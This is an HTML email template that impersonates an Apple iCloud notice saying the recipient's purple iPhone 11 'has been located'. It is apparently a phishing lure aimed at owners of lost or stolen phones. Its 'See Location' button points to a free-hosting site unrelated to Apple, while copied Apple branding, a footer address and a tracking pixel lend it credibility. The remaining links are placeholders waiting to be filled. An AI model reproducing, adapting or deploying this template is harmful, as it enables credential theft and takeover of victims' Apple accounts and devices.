<html>
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
        <meta name="viewport" content="width-device-width">
            <meta name="format-detection" content="address-no" />
            <meta name="format-detection" content="telephone-no" />
            <TITLE></TITLE>
            <style type="text/css">
                body {
                    margin: 0 !important;
                    padding: 0 !important;
                    -webkit-text-size-adjust: 100% !important;
                }
            a {
                text-decoration: none;
            }
            A:link {
                color: #008acd;
                text-decoration: none;
            }
            A:visited {
                color: #008acd;
                text-decoration: none;
            }
            A:hover {
                color: #1c4fad;
                text-decoration: underline;
            }
            A:active {
                color: #1c4fad;
                text-decoration: none;
            }
            .nobr {
                white-space: nowrap
            }
            a:hover.linkbutton {
                color: #2b2b2b !important;
                text-decoration: none !important;
                font-weight: 500 !important;
            }
            a:active.linkbutton {
                color: #2b2b2b !important;
                text-decoration: none !important;
                font-weight: 500 !important;
            }
            a:visited.linkbutton {
                color: #2b2b2b !important;
                text-decoration: none !important;
                font-weight: 500 !important;
            }
            .playButton {
                border-radius: 15px;
                padding: 4px 5px;
                background: #08c;
                color: white;
                font-size: 8px;
                vertical-align: middle;
            }
            @media screen and (-webkit-min-device-pixel-ratio:0) and (min-resolution:.001dpcm) {
                .playButton {
                    border-radius: 15px;
                    padding: 0px 4px;
                    background: #08c;
                    color: white;
                    font-size: 15px;
                    vertical-align: middle;
                }
            }
            @media screen and(-webkit-min-device-pixel-ratio:0) {
                .playButton {
                    border-radius: 15px;
                    padding: 0px 4px;
                    background: #08c;
                    color: white;
                    font-size: 15px;
                    vertical-align: middle;
                }
            }
            @media only screen and (min-device-width: 320px) and (max-device-width: 568px) {
                body[yahoo] {
                    overflow: hidden;
                    width: auto !important;
                    text-align: center !important;
                    margin: 0;
                    -webkit-text-size-adjust: 100% !important;
                }
                body[yahoo] .mainTable {
                    margin: 0 10px !important;
                }
                body[yahoo] .footer {
                    background-size: 100%;
                }
                body[yahoo] .footer .bottomContent span .nobr {
                    white-space: normal;
                    display: block;
                }
                body[yahoo] .header {
                    width: 250px !important;
                    word-break: break-word;
                }
                body[yahoo] .logoColumn {
                    width: 30px !important;
                }
                body[yahoo] .extraColumn {
                    width: 35px !important;
                }
                body[yahoo] .apple-logo {
                    padding-left: 12px !important;
                }
                body[yahoo] .centerColumn {
                    width: auto !important;
                }
                body[yahoo] .table-text.left {
                    width: 50px !important;
                }
                body[yahoo] .table-text.right {
                    width: 185px !important;
                }
                body[yahoo] .table-text.separator {
                    width: 10px !important;
                }
                body[yahoo] .footer .bottomContent {
                    padding-top: 15px !important;
                    display: block !important;
                }
                body[yahoo] .footer.content {
                    padding: 0px 10px !important;
                }
                body[yahoo] .footer .service {
                    display: block !important;
                }
            }
            </style>
    </head>
    <body align="center" yahoo="fix">
        <div class="mailwrapper" style="font-size: 15px; color: #666;">
            <table style="table-layout:fixed; width: 100%;">
                <tr>
                    <td>
                        <table class="mainTable" align="center" style="margin: 0 auto;font-size: inherit; line-height: inherit; text-align: center; border-spacing: 0; border-collapse: collapse; -premailer-cellpadding: 0; -premailer-cellspacing: 0; padding: 0; border: 0;" cellpadding="0" cellspacing="0">
                            <tr>
                                <td class="topPadding" colspan="3" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; height: 16px; -premailer-height: 16;" height="16"></td>
                            </tr>
                            <tr>
                                <td class="extraColumn" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; width: 64px;"></td>
                                <td class="centerColumn" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; width: 685px;">
                                    <table align="center" style="margin: 0 auto;font-size: inherit; line-height: inherit; padding: 0; border: 0;">
                                        <tr>
                                            <td align="center">
                                                <img src="https://store.storeimages.cdn-apple.com/4982/as-images.apple.com/is/iphone11-purple-select-2019?wid=470&hei=556&fmt=png-alpha&.v=1566960958082" width="150" height="200" border="0" style="display: block;" alt="" />
                                            </td>
                                        </tr>
                                        <tr>
                                            <td class="header titleSpacer" align="center" style="word-break: break-word; font-family: 'Helvetica Neue', Helvetica,Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; color: #2b2b2b; font-size: 27px; font-weight: 300; padding: 24px 0 16px;">
                                               Your iPhone 11 Purple has been located at  11:50  PM
                                            </td>
                                        </tr>
                                        <tr>
                                            <td class="content spacer1" align="center" style="word-break: break-word; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; color: #666; font-size: 15px; font-weight: 300; line-height: 20px; padding-bottom: 14px;">
                                                The latest information on your device is available 24 hours a day.
                                            </td>
                                        </tr>
                                        <tr>
                                            <td class="content spacer1" align="center">
                                                <a style="cursor: pointer !important; text-decoration: none !important; color: black !important;" aria-label="See Location" data-tooltip="See Location" href="%%LINK%%">
                                                    <a href="https://forgotten-support.000webhostapp.com/"><img src="https://i.ibb.co/C7MSW2f/boton.png" alt="boton" border="0"></a>
                                                      
                                                </a>
                                            </td>
                                        </tr>
                                    </table>
                                </td>
                                <td class="extraColumn" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; width: 64px;"> </td>
                            </tr>
                            <!-- Footer -->
                            <tr class="footerTopPadding" style="height: 17px; -premailer-height: 17;" height="17">
                                <td style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased;"></td>
                            </tr>
                            <tr>
                                <td class="footer background centerColumn" id="footerGroup1" colspan="3" background="https://statici.icloud.com/emailimages/v4/common/footer_gradient_web.png" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; width: 685px; font-size: 11px; line-height: 22px; color: #888; text-align: center; background-repeat: no-repeat; background-position: center top; padding: 15px 0 10px;" align="center">
                                    <img width="81" height="22" src="https://statici.icloud.com/emailimages/v4/common/icloud_footer_signoff@2x.png" class="icloud-logo" style="display: inline-block; width: 81px; height: 22px;" />
                                </td>
                            </tr>
                            <tr>
                                <td class="footer centerColumn content" colspan="3" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased; width: 685px; font-size: 11px; line-height: 18px; color: #888; text-align: center;" align="center">
                                    <span class="service">
                                        iCloud is a service provided by Apple.
                                    </span>
                                    <span class="footer1" style="white-space: nowrap;">
                                        <a href="%%LINK%%">
                                            Apple ID
                                        </a>
                                    </span>|
                                    <span class="footer1" style="white-space: nowrap;">
                                        <a href="%%LINK%%">
                                            Support
                                        </a>
                                    </span>|
                                    <span class="footer1" style="white-space: nowrap;">
                                        <a href="%%LINK%%">
                                            Terms and Conditions
                                        </a>
                                    </span>|
                                    <span class="footer1" style="white-space: nowrap;">
                                        <a href="%%LINK%%">
                                            Privacy Policy
                                        </a>
                                    </span>
                                    <br/>
                                    <span class="bottomContent" colspan="3">
                                        <span class="footer1" style="white-space: nowrap;">
                                            Copyright &copy; 2021
                                        </span>
                                        <span>
                                            Apple Distribution International, <span class="nobr"><a href="%%LINK%%">Hollyhill Industrial Estate, Hollyhill, Cork, Republic of Ireland.</a></span>
                                        </span>
                                        <span class="footer1" style="white-space: nowrap;">
                                            All rights reserved.
                                        </span>
                                    </span>
                                </td>
                            </tr>
                            <tr class="footerBottomPadding" style="height: 50px; -premailer-height: 50;" height="50">
                                <td style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-smooth: always; -webkit-font-smoothing: antialiased;"></td>
                            </tr>
                        </table>
                    </td>
                </tr>
            </table>
        </div>
    </body>
    <img src='http://outsideapple.apple.com/img/APPLE_EMAIL_LINK/spacer4.gif?v=2&a=k%2BmjWPCFEH1m5ry2zndhAs1%2FTkIv1fK%2BaIu7SVy37RFvzoZLFV5oBZaPYjyx9Wyb%2B1sYfcI3XJbybXsZj0jd5usqt80JTIOCT8DcF1IQqdpNxjIPHKcxSkr%2FA0IrGgGISMQ0lul4Ey5tZ2e4jSlttXwdjIXADgUNEC8FKTVzAQsG6cqbMGal4cnXxEAoLHvqyjbU5vLho4KI2tTPGobxpBGbMPnwrSurHwuP6ikiPU9qgE6gk1a%2Bb2txv4axrf7xtkT1%2FM2%2B0iWhWO3GIh5qs9HX2ObFKIE5BwN1sjeey2Pdp%2BCcqSvWkhN9cBxZCZk6Sf6fqg3s6Y6QPaILtiyvWcSO0GgyTRVMHD5zh8%2F23vc%' />
        </html>